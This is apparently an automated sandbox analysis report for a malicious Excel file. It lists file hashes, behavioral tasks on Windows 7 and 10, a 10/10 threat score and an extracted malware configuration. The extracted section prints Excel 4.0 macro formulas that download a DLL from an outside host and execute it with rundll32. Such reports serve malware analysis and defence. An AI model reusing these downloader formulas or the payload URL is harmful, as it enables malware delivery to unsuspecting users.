General
Target
49ed0e7aed118c46daed37f7d0eb62ab111cf6f9ab295b4b165ce82585539908.zip
Size
61KB
Sample
210304-lclhxp6vp6
MD5
b5102277fec5cf20132d3d542cf4648e
SHA1
40610a77a25e9ff604f7e6f9320e8dab8036a142
SHA256
876752ccf051c21b583d504ed35353b986a38545fc8feeb399fceb3efdf035f7
SHA512
eb45d4953505fe4552434c5a5fe666b4e8d83918245f31214b1c3b1ed6bb3b817f8e46725716982e4c835e55f7ab1903025672fee76e7299b5e003d86dd0dd32
Behavioral task
behavioral1
Sample
49ed0e7aed118c46daed37f7d0eb62ab111cf6f9ab295b4b165ce82585539908.xls
Resource
win7v20201028
Behavioral task
behavioral2
Sample
49ed0e7aed118c46daed37f7d0eb62ab111cf6f9ab295b4b165ce82585539908.xls
Resource
win10v20201028
Malware Config
Extracted
http://gveejlsffxmfjlswjmfm.com/files/april23.dll
formulas
=CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://gveejlsffxmfjlswjmfm.com/files/april23.dll","C:\ProgramData\todxofs.dll",0,0)
=CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","rundll32.exe","C:\ProgramData\todxofs.dll,DllRegisterServer",0,0)
=HALT()
Extracted
http://gveejlsffxmfjlswjmfm.com/files/april23.dll
Targets
Target
49ed0e7aed118c46daed37f7d0eb62ab111cf6f9ab295b4b165ce82585539908.xls
Size
76KB
MD5
228003634e57d37f08787be02c0b6c14
SHA1
0e71bb6f250012609c08adf74d1cec6587b6cc05
SHA256
49ed0e7aed118c46daed37f7d0eb62ab111cf6f9ab295b4b165ce82585539908
SHA512
5adcc817a196ef0cfc176d089564d8d87528e0a69134287b8858907a8e97040bdbc05b0b5d87db9a9856e641673c27effc3bed5f70754e87dbbef0d64dfa1375
Score 10/10
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.